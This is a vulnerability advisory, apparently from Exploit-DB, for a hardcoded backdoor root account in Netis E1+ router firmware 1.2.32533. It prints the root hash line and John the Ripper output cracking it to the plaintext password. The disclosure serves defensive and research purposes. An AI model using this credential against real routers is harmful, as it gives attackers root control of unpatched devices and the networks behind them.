Netis E1+ 1.2.32533 - Backdoor Account (root)

vendor:

Netis E1+

by:

Besim ALTINOK

7.5

CVSS

HIGH

Backdoor Account

798

CWE

Product Name: Netis E1+

Affected Version From: 1.2.32533

Affected Version To: 1.2.32533

Patch Exists: NO

Related CWE:

CPE: o:netis:e1+:1.2.32533

Metasploit:

Other Scripts:

Platforms Tested: Netis E1+ V1.2.32533

2020

Netis E1+ 1.2.32533 – Backdoor Account (root)

The Netis E1+ router version 1.2.32533 contains a backdoor account that allows unauthorized access with root privileges. The backdoor account can be accessed using the credentials 'root:abSQTPcIskFGc:0:0:root:/:/bin/sh'. This vulnerability allows an attacker to gain full control over the router and potentially compromise the network.

Mitigation:

The vendor has not provided any official patch or mitigation for this vulnerability. It is recommended to discontinue the use of the affected router model or update to the latest firmware version if available.

Source

Exploit-DB raw data:

# Exploit Title: Netis E1+ 1.2.32533 - Backdoor Account (root)
# Date: 2020-04-25
# Author: Besim ALTINOK
# Vendor Homepage: http://www.netis-systems.com
# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204
# Version: V1.2.32533
# Tested on: Netis E1+ V1.2.32533
# Credit: İsmail BOZKURT
-----------------------------

*root:abSQTPcIskFGc:0:0:root:/:/bin/sh*


Created directory: /home/pentestertraining/.john
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: MaxLen = 13 is too large for the current hash type, reduced
to 8*realtek          (root)*
1g 0:00:00:28 3/3 0.03533g/s 1584Kp/s 1584Kc/s 1584KC/s realka2..reasll5
Use the "--show" option to display all of the cracked passwords reliably
Session completed